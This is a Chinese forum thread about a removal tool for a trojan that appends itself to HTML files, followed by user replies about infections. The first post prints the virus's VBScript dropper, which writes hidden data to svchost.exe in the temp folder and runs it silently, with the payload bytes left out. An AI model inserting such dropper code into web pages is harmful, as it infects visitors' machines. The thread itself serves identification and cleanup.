yun 发表于 2017-5-24 17:58:49

专杀HTML感染木马工具

这个病毒会在所有html的文件的后面直接加上他自己的数据    我也不知道是什么数据    反正是特别那个啥

各种说的什么远控马   什么劫持快照  什么的

大概结构:<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = 这里本来有好长的十六进制的数据(应该是吧。)
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")  
WSHshell.Run DropPath, 0
//--></SCRIPT>该工具专杀这个病毒

工具截图:


工具下载地址:**** Hidden Message *****

pangkee 发表于 2017-5-25 01:29:09

这么牛掰?没发现啥组织出来认领哈

583558386 发表于 2017-5-25 08:50:19


这么牛掰?没发现第一看到

左右为难 发表于 2017-5-25 13:23:55

这么牛掰?.........

feihu 发表于 2017-5-26 07:50:08

我之前就是中的就是这种病毒,特别烦人

小熊熊 发表于 2017-7-6 16:59:03

我html本地的 后面都加了很长一串 。 。 。 这个是直接删掉后面那个,还是把html文件给删了?

feihu 发表于 2017-7-6 17:02:29

小熊熊 发表于 2017-7-6 16:59 static/image/common/back.gif
我html本地的 后面都加了很长一串 。 。 。 这个是直接删掉后面那个,还是把html文件给删了?

自己本地可以试试啊,我待会试试看

hackerc 发表于 2017-7-10 00:37:14

感谢分享~经常遇到html感染~不晓得为什么就感染了

雨爱 发表于 2017-7-14 23:07:14

good    好东西

小熊熊 发表于 2017-8-18 17:51:01

feihu 发表于 2017-7-6 17:02 static/image/common/back.gif
自己本地可以试试啊,我待会试试看

恩 你试的怎么样了 我的被360删了..

dhb94 发表于 2019-6-6 14:23:03

好牛掰的样子

zhang1230 发表于 2019-6-13 08:50:05

厉害 收了

song1021165315 发表于 2019-6-20 18:16:43

服务费服务二人各热热热
页: [1]
查看完整版本: 专杀HTML感染木马工具